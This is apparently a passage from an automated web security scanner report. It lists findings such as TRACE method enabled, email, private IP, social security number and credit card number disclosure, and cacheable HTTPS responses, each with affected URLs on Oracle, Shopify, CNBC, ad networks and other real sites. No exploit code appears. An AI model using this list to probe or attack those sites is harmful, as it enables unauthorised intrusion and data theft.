20.289. http://www.oracle.com/us/solutions/performance-scalability/index.html

20.290. http://www.oracle.com/us/solutions/solutions-165852.html

20.291. http://www.oracle.com/us/sun/index.html

20.292. http://www.oracle.com/us/support/advanced-customer-services/index.html

20.293. http://www.oracle.com/us/support/contact-068555.html

20.294. http://www.oracle.com/us/support/development-tools-080025.html

20.295. http://www.oracle.com/us/support/index.html

20.296. http://www.oracle.com/us/support/lifetime-support/index.html

20.297. http://www.oracle.com/us/support/oracle-support-services-359636.html

20.298. http://www.oracle.com/us/support/policies/index.html

20.299. http://www.oracle.com/us/support/premier/index.html

20.300. http://www.oracle.com/us/support/support-integration/index.html

20.301. http://www.oracle.com/us/syndication/subscribe/index.html

20.302. http://www.oracle.com/us/technologies/cloud/index.html

20.303. http://www.oracle.com/us/technologies/java/index.html

20.304. http://www.oracle.com/us/technologies/virtualization/index.html

20.305. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

20.306. http://www.rayalab.com/

20.307. http://www.rayalab.com/free_sample.html

20.308. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

20.309. http://www.readwriteweb.com/404.html

20.310. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

20.311. http://www.resourcepoint.net/

20.312. http://www.resourcepoint.net/index.htm

20.313. http://www.sapient.com/en-us/about-sapient/alliances.html

20.314. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

20.315. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

20.316. http://www.sapient.com/en-us/search.html

20.317. http://www.shopify.com/

20.318. http://www.shopify.com/admin/auth/login

20.319. http://www.shopify.com/examples

20.320. http://www.shopify.com/login

20.321. http://www.shopify.com/tour

20.322. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

20.323. http://www.tenzing.com/atg-ecommerce-hosting.asp

20.324. http://www.tenzing.com/cloud/cloud-pricing.asp

20.325. http://www.tenzing.com/cloud/sign-up-now.asp

20.326. http://www.tenzing.com/hosting-solutions.asp

20.327. http://www.tenzing.com/sitemap.asp

20.328. http://www.volusion.com/

20.329. http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff

20.330. http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff

20.331. http://www.youtube.com/embed/kPJh9FWuOks

20.332. http://www.youtube.com/embed/oxqAPZmFSUU

20.333. http://www.znode.com/znode-multifront/architecture.aspx

20.334. http://www.znode.com/znode-multifront/default.aspx

20.335. http://www.znode.com/znode-multifront/feature.aspx

21. TRACE method is enabled

21.1. http://1215.ic-live.com/

21.2. http://ads1.msn.com/

21.3. http://afe.specificclick.net/

21.4. http://c.statcounter.com/

21.5. http://cache.specificmedia.com/

21.6. http://channelsun.sun.com/

21.7. http://clk.fetchback.com/

21.8. http://convctr.overture.com/

21.9. http://d.ads.readwriteweb.com/

21.10. http://d1.openx.org/

21.11. http://deloitte.12hna.com/

21.12. http://dev.mysql.com/

21.13. http://digg.com/

21.14. https://dne.oracle.com/

21.15. http://dynpages-mktas.oracle.com/

21.16. http://education.oracle.com/

21.17. https://education.oracle.com/

21.18. http://fido.fetchback.com/

21.19. http://imp.fetchback.com/

21.20. http://legolas.nexac.com/

21.21. http://msnbcmedia.msn.com/

21.22. http://optimized-by.rubiconproject.com/

21.23. http://ping.crowdscience.com/

21.24. http://pixel.everesttech.net/

21.25. http://pixel.fetchback.com/

21.26. http://r.openx.net/

21.27. http://rt.legolas-media.com/

21.28. http://serve.directdigitalllc.com/

21.29. http://tap.rubiconproject.com/

21.30. http://tracker.wordstream.com/

21.31. http://tracking.hubspot.com/

21.32. http://www.beautyproductsdirect.com/

21.33. http://www.fekkai.com/

21.34. http://www.fetchback.com/

21.35. http://www.gillettevenus.com/

21.36. http://www.readwriteweb.com/

22. Email addresses disclosed

22.1. http://ads1.msn.com/library/dap.js

22.2. http://assets1.csc.com/es/downloads/7380_2.pdf

22.3. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

22.4. http://blog.ulf-wendel.de/

22.5. http://blogs.oracle.com/otn/

22.6. http://blogs.oracle.com/otn/feed/entries/atom

22.7. http://blogs.oracle.com/otn/feed/entries/rss

22.8. https://dne.oracle.com/pls/uns/OPT_OUT.th

22.9. http://edge.sapient.com/assets/scripts/global.js

22.10. http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js

22.11. http://education.oracle.com/education/jscripts/JSSerializer.js

22.12. http://education.oracle.com/education/jscripts/OUheaderCSS.js

22.13. http://education.oracle.com/education/jscripts/s_code.js

22.14. https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js

22.15. https://education.oracle.com/education/jscripts/OUheaderCSS.js

22.16. https://education.oracle.com/education/jscripts/s_code.js

22.17. http://event.on24.com/r.htm

22.18. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

22.19. https://forums.oracle.com/forums/themes/english/resources/s_code.js

22.20. https://login.cnbc.com/cas/js/cnbc_login.js

22.21. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

22.22. https://oracleus.wingateweb.com/portal/newreg.ww

22.23. https://register.cnbc.com/forgotPassword1.do

22.24. http://search.oracle.com/search/searchui/s_code.js

22.25. https://shop.oracle.com/pls/ostore/f

22.26. https://support.bigcommerce.com/javascript/livesearch.js

22.27. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.innerfade.js

22.28. http://twitter.com/favorites/shopify.json

22.29. http://webzoomers.com/

22.30. https://www.atg.com/en/password/request/

22.31. https://www.atg.com/javascript/form.js

22.32. http://www.beautyproductsdirect.com/

22.33. http://www.beautyproductsdirect.com/inc/js/jquery.innerfade.js

22.34. http://www.beautyproductsdirect.com/lashes.html

22.35. http://www.covergirl.com/CSS/jqModal.css

22.36. http://www.covergirl.com/Script/jqModal_mod.js

22.37. http://www.covergirl.com/Script/jquery.cookie.js

22.38. http://www.covergirl.com/Script/jquery.hoverIntent.min.js

22.39. http://www.csc.com/contact_us

22.40. http://www.csc.com/javascripts/public/s_code.js

22.41. http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js

22.42. http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js

22.43. http://www.fekkai.com/js/mootools-1.2.4.2-more.js

22.44. http://www.fekkai.com/js/multibox/multiBox.js

22.45. http://www.fekkai.com/js/multibox/overlay.js

22.46. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

22.47. http://www.harbottle.com/hnl/pages/pubs/479

22.48. http://www.netsuite.com/portal/javascript/DD_roundies.js

22.49. http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js

22.50. http://www.netsuite.com/portal/javascript/jquery.colorbox.js

22.51. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

22.52. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

22.53. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

22.54. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

22.55. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

22.56. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

22.57. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

22.58. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

22.59. http://www.oracle.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

22.60. http://www.oracle.com/openworld/contact/index.html

22.61. http://www.oracle.com/openworld/register/packages/index.html

22.62. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

22.63. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

22.64. http://www.oracle.com/us/assets/masterhp.js

22.65. http://www.oracle.com/us/ciocentral/index.html

22.66. http://www.oracle.com/us/corporate/Acquisitions/index.html

22.67. http://www.oracle.com/us/corporate/analystrelations/index.html

22.68. http://www.oracle.com/us/corporate/citizenship/index.html

22.69. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

22.70. http://www.oracle.com/us/corporate/insight/index.html

22.71. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

22.72. http://www.oracle.com/us/corporate/press/Executives/index.html

22.73. http://www.oracle.com/us/corporate/press/index.html

22.74. http://www.oracle.com/us/corporate/profit/index.html

22.75. http://www.oracle.com/us/corporate/publishing/index.html

22.76. http://www.oracle.com/us/education/oukc/email-079121.html

22.77. http://www.oracle.com/us/industries/financial-services/index.html

22.78. http://www.oracle.com/us/industries/retail/index.html

22.79. http://www.oracle.com/us/partnerships/solutions/index.html

22.80. http://www.oracle.com/us/products/applications/primavera/index.html

22.81. http://www.oracle.com/us/sun/index.html

22.82. http://www.oracle.com/us/support/advanced-customer-services/index.html

22.83. http://www.oracle.com/us/support/contact-068555.html

22.84. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

22.85. http://www.rayalab.com/

22.86. http://www.rayalab.com/free_sample.html

22.87. http://www.resourcepoint.net/ATG-Services.htm

22.88. http://www.resourcepoint.net/TibcoTech.htm

22.89. http://www.resourcepoint.net/contactus.htm

22.90. http://www.resourcepoint.net/form.htm

22.91. http://www.revsolutionsinc.com/careers.html

22.92. http://www.revsolutionsinc.com/careers_req_7.html

22.93. http://www.revsolutionsinc.com/contact_us.html

22.94. http://www.sophelle.com/

22.95. http://www.sophelle.com/Contact-Us/

22.96. http://www.sophelle.com/Contact-Us/thank-you.html

22.97. http://www.sophelle.com/Products/

22.98. http://www.sophelle.com/Products/CQ/free-trial.html

22.99. http://www.sophelle.com/Products/CQ/index.html

22.100. http://www.sophelle.com/Products/accelerator2.html

22.101. http://www.sophelle.com/Success-Stories/

22.102. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

22.103. http://www.sophelle.com/products/cq/

22.104. http://www.sophelle.com/products/cq/expert-analysis.html

22.105. http://www.sophelle.com/products/cq/frequently-asked-questions.html

22.106. http://www.sophelle.com/products/cq/functional-testing.html

22.107. http://www.sophelle.com/products/cq/performance-testing.html

22.108. http://www.sophelle.com/products/cq/pricing-options.html

22.109. http://www.sophelle.com/products/cq/thank-you-trial.html

22.110. http://www.sophelle.com/products/cq/user-interface-testing.html

22.111. http://www.tenzing.com/atg-ecommerce-hosting.asp

22.112. http://www.tenzing.com/cloud/cloud-pricing.asp

22.113. http://www.tenzing.com/cloud/sign-up-now.asp

22.114. http://www.tenzing.com/css/basic_stylesheet_v1.1.css

22.115. http://www.tenzing.com/css/navigation_stylesheet_v1.1.css

22.116. http://www.tenzing.com/hosting-solutions.asp

22.117. http://www.tenzing.com/js/jquery/jquery.accordion.js

22.118. http://www.tenzing.com/sitemap.asp

22.119. http://www.tenzing.com/validation.js

23. Private IP addresses disclosed

23.1. http://blog.ulf-wendel.de/

23.2. http://code.openark.org/blog/

23.3. http://developers.facebook.com/plugins/

23.4. http://digg.com/submit

23.5. http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js

23.6. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.7. http://www.facebook.com/extern/login_status.php

23.8. http://www.facebook.com/extern/login_status.php

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/plugins/activity.php

23.11. http://www.facebook.com/plugins/activity.php

23.12. http://www.facebook.com/plugins/like.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.facebook.com/plugins/like.php

23.19. http://www.facebook.com/plugins/like.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.fekkai.com/

23.23. http://www.google.com/sdch/StnTz5pY.dct

23.24. http://www.oracle.com/technetwork/community/developer-vm/index.html

23.25. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

23.26. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

23.27. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

23.28. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

23.29. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

23.30. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

24. Social security numbers disclosed

24.1. http://assets.olark.com/a/assets/v0/site/7855-664-10-3086.js

24.2. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

24.3. http://www.shopify.com/admin/auth/login

24.4. http://www.shopify.com/examples

24.5. http://www.shopify.com/login

24.6. http://www.shopify.com/tour

25. Credit card numbers disclosed

25.1. http://api.cnbc.com/api/movers/movers.asp

25.2. http://assets1.csc.com/es/downloads/7380_2.pdf

25.3. http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf

25.4. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

25.5. http://education.oracle.com/education/jscripts/otn_nav1.js

25.6. https://education.oracle.com/education/jscripts/otn_nav1.js

25.7. http://www.oracle.com/ao/index.html

25.8. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html

25.9. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html

25.10. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html

25.11. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html

25.12. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

25.13. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

25.14. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

25.15. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

25.16. http://www.oracle.com/index.html

25.17. http://www.oracle.com/technetwork/apps-tech/index-095827.html

25.18. http://www.oracle.com/technetwork/apps-tech/index-097651.html

25.19. http://www.oracle.com/technetwork/apps-tech/index.html

25.20. http://www.oracle.com/technetwork/architect/index.html

25.21. http://www.oracle.com/technetwork/articles/index.html

25.22. http://www.oracle.com/technetwork/community/developer-vm/index.html

25.23. http://www.oracle.com/technetwork/community/join/overview/index.html

25.24. http://www.oracle.com/technetwork/community/oracle-ace/index.html

25.25. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html

25.26. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html

25.27. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html

25.28. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html

25.29. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html

25.30. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html

25.31. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html

25.32. http://www.oracle.com/technetwork/dbadev/index.html

25.33. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html

25.34. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html

25.35. http://www.oracle.com/technetwork/developer-tools/index.html

25.36. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html

25.37. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html

25.38. http://www.oracle.com/technetwork/index.html

25.39. http://www.oracle.com/technetwork/indexes/documentation/index.html

25.40. http://www.oracle.com/technetwork/indexes/downloads/index.html

25.41. http://www.oracle.com/technetwork/indexes/products/index.html

25.42. http://www.oracle.com/technetwork/java/index.html

25.43. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

25.44. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

25.45. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

25.46. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

25.47. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

25.48. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

25.49. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

25.50. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

25.51. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

25.52. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

25.53. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

25.54. http://www.oracle.com/technetwork/systems/index.html

25.55. http://www.oracle.com/technetwork/topics/cloud/index.html

25.56. http://www.oracle.com/technetwork/topics/index.html

25.57. http://www.oracle.com/technetwork/topics/newtojava/index.html

25.58. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

25.59. http://www.oracle.com/technetwork/topics/security/index.html

25.60. http://www.oracle.com/technetwork/topics/soa/index.html

25.61. http://www.oracle.com/technetwork/topics/virtualization/index.html

25.62. http://www.oracle.com/us/community/index.html

25.63. http://www.oracle.com/us/corporate/Acquisitions/index.html

25.64. http://www.oracle.com/us/corporate/analystrelations/index.html

25.65. http://www.oracle.com/us/corporate/blogs/index.html

25.66. http://www.oracle.com/us/corporate/careers/index.html

25.67. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

25.68. http://www.oracle.com/us/corporate/citizenship/index.html

25.69. http://www.oracle.com/us/corporate/customers/index.html

25.70. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

25.71. http://www.oracle.com/us/corporate/features/engineered-173370.html

25.72. http://www.oracle.com/us/corporate/history/index.html

25.73. http://www.oracle.com/us/corporate/index.html

25.74. http://www.oracle.com/us/corporate/innovation/index.html

25.75. http://www.oracle.com/us/corporate/insight/index.html

25.76. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

25.77. http://www.oracle.com/us/corporate/investor-relations/index.html

25.78. http://www.oracle.com/us/corporate/oracle-racing-070515.html

25.79. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

25.80. http://www.oracle.com/us/corporate/press/Executives/index.html

25.81. http://www.oracle.com/us/corporate/press/index.html

25.82. http://www.oracle.com/us/corporate/pricing/index.html

25.83. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

25.84. http://www.oracle.com/us/corporate/profit/index.html

25.85. http://www.oracle.com/us/corporate/publishing/index.html

25.86. http://www.oracle.com/us/index.html

25.87. http://www.oracle.com/us/industries/communications/index.html

25.88. http://www.oracle.com/us/industries/education-and-research/018753.htm

25.89. http://www.oracle.com/us/industries/engineering-and-construction/index.html

25.90. http://www.oracle.com/us/industries/financial-services/index.html

25.91. http://www.oracle.com/us/industries/index.html

25.92. http://www.oracle.com/us/industries/retail/index.html

25.93. http://www.oracle.com/us/partnerships/solutions/index.html

25.94. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html

25.95. http://www.oracle.com/us/products/applications/fusion/index.html

25.96. http://www.oracle.com/us/products/applications/index.html

25.97. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html

25.98. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html

25.99. http://www.oracle.com/us/products/applications/primavera/index.html

25.100. http://www.oracle.com/us/products/consulting/index.html

25.101. http://www.oracle.com/us/products/database/index.html

25.102. http://www.oracle.com/us/products/enterprise-manager/index.html

25.103. http://www.oracle.com/us/products/financing/index.html

25.104. http://www.oracle.com/us/products/index.html

25.105. http://www.oracle.com/us/products/middleware/exalogic/index.html

25.106. http://www.oracle.com/us/products/middleware/index.html

25.107. http://www.oracle.com/us/products/ondemand/index.html

25.108. http://www.oracle.com/us/products/productslist/index.html

25.109. http://www.oracle.com/us/products/servers-storage/index.html

25.110. http://www.oracle.com/us/products/servers-storage/solaris/index.html

25.111. http://www.oracle.com/us/products/tools/index.html

25.112. http://www.oracle.com/us/social-media/facebook/index.html

25.113. http://www.oracle.com/us/social-media/linkedin/index.html

25.114. http://www.oracle.com/us/social-media/twitter/index.html

25.115. http://www.oracle.com/us/solutions/corporate-governance/index.html

25.116. http://www.oracle.com/us/solutions/datawarehousing/index.html

25.117. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

25.118. http://www.oracle.com/us/solutions/midsize/index.html

25.119. http://www.oracle.com/us/solutions/performance-scalability/index.html

25.120. http://www.oracle.com/us/solutions/solutions-165852.html

25.121. http://www.oracle.com/us/sun/index.html

25.122. http://www.oracle.com/us/support/advanced-customer-services/index.html

25.123. http://www.oracle.com/us/support/contact-068555.html

25.124. http://www.oracle.com/us/support/development-tools-080025.html

25.125. http://www.oracle.com/us/support/index.html

25.126. http://www.oracle.com/us/support/lifetime-support/index.html

25.127. http://www.oracle.com/us/support/oracle-support-services-359636.html

25.128. http://www.oracle.com/us/support/policies/index.html

25.129. http://www.oracle.com/us/support/premier/index.html

25.130. http://www.oracle.com/us/support/support-integration/index.html

25.131. http://www.oracle.com/us/syndication/subscribe/index.html

25.132. http://www.oracle.com/us/technologies/cloud/index.html

25.133. http://www.oracle.com/us/technologies/java/index.html

25.134. http://www.oracle.com/us/technologies/virtualization/index.html

25.135. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

26. Robots.txt file

26.1. http://1215.ic-live.com/goat.php

26.2. http://4qinvite.4q.iperceptions.com/1.aspx

26.3. http://904-kuw-942.mktoresp.com/webevents/visitWebPage

26.4. http://a.tribalfusion.com/displayAd.js

26.5. http://ad.doubleclick.net/adj/nbcu.cnbc/search

26.6. http://ad.yieldmanager.com/pixel

26.7. http://adclick.g.doubleclick.net/aclk

26.8. http://ads.pointroll.com/PortalServe/

26.9. http://adx.g.doubleclick.net/pagead/adview

26.10. http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js

26.11. http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0

26.12. http://api.bizographics.com/v1/profile.redirect

26.13. http://api.twitter.com/1/statuses/user_timeline.json

26.14. http://assets1.csc.com/home/media/billboard195.swf

26.15. http://at.amgdgt.com/ads/

26.16. http://b.scorecardresearch.com/b

26.17. http://blog.harbottle.com/dm

26.18. http://blogs.oracle.com/otn/

26.19. https://bugzilla.mozilla.org/show_bug.cgi

26.20. http://c.betrad.com/surly.js

26.21. http://c.brightcove.com/services/viewer/federated_f9

26.22. http://c.statcounter.com/t.php

26.23. http://cdn.gigya.com/JS/socialize.js

26.24. http://cdn.krxd.net/config/

26.25. http://cdn5.tribalfusion.com/media/1956006/frame.html

26.26. http://clickserve.dartsearch.net/link/click

26.27. http://clk.fetchback.com/serve/fb/click

26.28. http://cm.g.doubleclick.net/pixel

26.29. https://cms.paypal.com/us/cgi-bin/

26.30. http://cnbc.com/crossdomain.xml

26.31. http://content.links.channelintelligence.com/images/blank.gif

26.32. http://convctr.overture.com/images/cc/cc.gif

26.33. http://d.ads.readwriteweb.com/spcjs.php

26.34. http://d1.openx.org/ck.php

26.35. http://d7.zedo.com/jsc/d3/fl.js

26.36. http://deloitte.12hna.com/preferences/index.php

26.37. http://dev.mysql.com/common/js/s_code_remote.js

26.38. http://digg.com/submit

26.39. https://docs.google.com/

26.40. http://download.oracle.com/docs/html/E13982_01/wsassemble.htm

26.41. http://edge.sapient.com/assets/images/favicon.ico

26.42. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc

26.43. https://education.oracle.com/favicon.ico

26.44. http://event.on24.com/r.htm

26.45. https://event.on24.com/eventRegistration/prereg/register.jsp

26.46. http://events.oracle.com/search/search

26.47. http://executivevision.cnbc.com/

26.48. http://fls.doubleclick.net/activityi

26.49. http://fonts.googleapis.com/css

26.50. https://forms.netsuite.com/app/site/crm/externalleadpage.nl

26.51. https://forums.oracle.com/forums/style/style.jsp

26.52. http://img-cdn.mediaplex.com/0/17353/universal.html

26.53. http://imp.fetchback.com/serve/fb/adtag.js

26.54. http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597

26.55. http://keywords.fmpub.net/

26.56. http://l.addthiscdn.com/live/t00/250lo.gif

26.57. http://l.apture.com/v3/

26.58. http://legolas.nexac.com/lgalt

26.59. http://m.cnbc.com/

26.60. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

26.61. http://netsuite-www.baynote.net/baynote/customerstatus2

26.62. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

26.63. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3

26.64. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.65. http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694

26.66. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163

26.67. http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217

26.68. http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592

26.69. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

26.70. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

26.71. https://oracleus.wingateweb.com/portal/newreg.ww

26.72. http://pagead2.googlesyndication.com/pagead/imgad

26.73. http://pg.links.channelintelligence.com/pages/CBLJS.asp

26.74. http://pg.links.origin.channelintelligence.com/pages/wl.asp

26.75. http://pi.pardot.com/analytics

26.76. http://pixel.everesttech.net/1688/i

26.77. http://pixel.fetchback.com/serve/fb/pdc

26.78. http://pixel.mathtag.com/event/img

26.79. http://pixel.quantserve.com/pixel

26.80. http://r.casalemedia.com/j.gif

26.81. http://rd.rlcdn.com/rd

26.82. http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm

26.83. http://rt.legolas-media.com/lgrt

26.84. http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css

26.85. http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf

26.86. http://s7.addthis.com/js/addthis_widget.php

26.87. http://search.oracle.com/search/search

26.88. http://search.twitter.com/search.json

26.89. http://services.krxd.net/pixel.gif

26.90. https://shop.oracle.com/store/Database

26.91. http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf

26.92. http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451

26.93. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

26.94. http://tf.nexac.com/media/1809966/na.html

26.95. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

26.96. http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json

26.97. http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575

26.98. http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif

26.99. http://www.actonsoftware.com/acton/bn/1227/visitor.gif

26.100. http://www.apture.com/js/apture.js

26.101. http://www.atg.com/

26.102. https://www.atg.com/service/main.jsp

26.103. http://www.beautyproductsdirect.com/

26.104. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

26.105. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

26.106. http://www.bizographics.com/collect/

26.107. http://www.cnbc.com/

26.108. http://www.csc.com/

26.109. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp

26.110. https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp

26.111. http://www.deloitte.com/

26.112. http://www.facebook.com/extern/login_status.php

26.113. http://www.fetchback.com/

26.114. http://www.google-analytics.com/__utm.gif

26.115. http://www.googleadservices.com/pagead/aclk

26.116. http://www.harbottle.com/hnl/pages/hnl.php

26.117. http://www.imiclk.com/cgi/r.cgi

26.118. http://www.linkedin.com/countserv/count/share

26.119. http://www.marykay.com/

26.120. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html

26.121. http://www.oracle.com/index.html

26.122. http://www.readwriteweb.com/enterprise/2010/11/oracle.php

26.123. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

26.124. http://www.shopify.com/

26.125. http://www.sophelle.com/

26.126. http://www.tenzing.com/atg-ecommerce-hosting.asp

26.127. http://www.volusion.com/

26.128. http://www.youtube.com/v/JWMKXb1Guq4

26.129. http://www.znode.com/znode-multifront/default.aspx

26.130. http://www2.znode.com/analytics

27. Cacheable HTTPS response

27.1. https://bugzilla.mozilla.org/show_bug.cgi

27.2. https://deloitte.zettaneer.com/Subscriptions/

27.3. https://dne.oracle.com/pls/uns/OPT_OUT.th

27.4. https://event.on24.com/eventRegistration/prereg/register.jsp

27.5. https://forms.netsuite.com/core/media/media.nl

27.6. https://forums.oracle.com/forums/category.jspa

27.7. https://forums.oracle.com/forums/guestsettings!default.jspa

27.8. https://forums.oracle.com/forums/main.jspa

27.9. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

27.10. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

27.11. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

27.12. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

27.13. https://forums.oracle.com/forums/themes/english/resources/s_code.js

27.14. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

27.15. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

27.16. https://forums.oracle.com/forums/themes/english/resources/style.css

27.17. https://login.cnbc.com/

27.18. https://login.cnbc.com/cas/checkCasTicket

27.19. https://login.oracle.com/oam/server/sso/auth_cred_submit

27.20. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

27.21. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

27.22. https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx

27.23. https://myprofile.oracle.com/EndUser/images/fading-background.png

27.24. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

27.25. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

27.26. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

